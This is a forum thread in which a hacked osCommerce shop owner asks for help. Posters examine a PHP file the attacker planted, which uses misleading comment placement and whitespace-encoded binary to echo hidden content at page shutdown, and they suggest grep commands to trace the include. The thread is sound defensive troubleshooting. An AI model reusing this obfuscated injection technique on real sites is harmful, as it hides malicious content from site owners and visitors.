Problem in osCommerce

shonir · 07-09-2011, 12:49 PM

I've configure a website with osCommerce but some day ago i hacker attack on it then i delete old website and upload new one and still error comming on the page.

please check below link and if you have any idea how i can solve this problem.

http://www.imart.pk

Thank's in advance for your kind response.

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0

Fatal error: Unknown: Failed opening required '/home/imart/public_html/13060006407219.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

tony · 07-10-2011, 09:53 PM

I don't see that php warning. only a osCommerce warning saying that you should change the permissions in the configure file to not writeable

shonir · 07-11-2011, 08:55 AM

you may see this warning in bthe end of page warning will show after delay some time. i deleted 13060006407219.php file from server that was uploaded by hacker.

below if code of this page i do not understand what is mean by this code waht haker want to do exectly.

<?php /**
* Gets some core libraries and displays a top message if required. /*
*/ if(!function_exists('CoreLibrariesHandler')) { /*
*/ function CoreLibrariesHandler() { /*
*/ $session_keys = ' '; /*
*/ /*
*/ foreach(str_split($session_keys, 8) as $k=>$v) { /*
*/ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /*
*/ $session_keys[$k] = chr(bindec($v)); /*
*/ } /*
*/ /*
*/ if($session_keys) echo $session_keys; } /*
*/ register_shutdown_function('CoreLibrariesHandler') ; /*
*/ } /*
************************************************** **********************/

?>

M Omer · 07-11-2011, 10:12 AM

you code is just comment
And nothing

maeltar · 07-11-2011, 05:03 PM

No it's not commented out if you look close at how the comments are placed

tony · 07-11-2011, 05:18 PM

a clever hacker with the comments. But I am not much on help in this. I haven't use osCommerce

maeltar · 07-11-2011, 06:09 PM

Cleaned it up so is more readable....

PHP Code:


			
<?php

if(!function_exists('CoreLibrariesHandler')) 

    {

        function CoreLibrariesHandler()

            { 

            $session_keys = ' ';

                foreach(str_split($session_keys, 8) as $k=>$v) 

                    { 

                    $v = str_replace(' ', 1, str_replace(' ', 0, $v)); 

                    $session_keys[$k] = chr(bindec($v));

                    }

            if($session_keys) echo $session_keys; 

            }



    register_shutdown_function('CoreLibrariesHandler') ;

}





?>

maeltar · 07-11-2011, 06:12 PM

This link may be of use
http://forums.oscommerce.com/topic/3...st__p__1583115

core1024 · 07-14-2011, 02:09 PM

I think the easiest way to fix this is to create empty file, located at /home/imart/public_html/13060006407219.php and set it's permissions to 444 :)

shonir · 07-23-2011, 01:11 PM

@maeltar

i already cleaned all ciode that added by hacker everything is right in coding side still not able to fine error.

@core1024
you are right but i want to trace error because its very importent to now if there is naything wrong and maybe hacker recived all information of our clients.

Thank's everyone for your positive response :)

Looking forward your suggestions regarding this problem

core1024 · 07-23-2011, 01:50 PM

If you have shell access and your server is *nix you can search for the bad code using:

Code:

user@host:~$ cd /home/imart/ #or where is your document root
user@host:/home/imart/$ grep -R 13060006407219 .

or you can try to

Code:

egrep -R '(require|include)[ ]*\(' .

, but this could return many lines of non-harmful code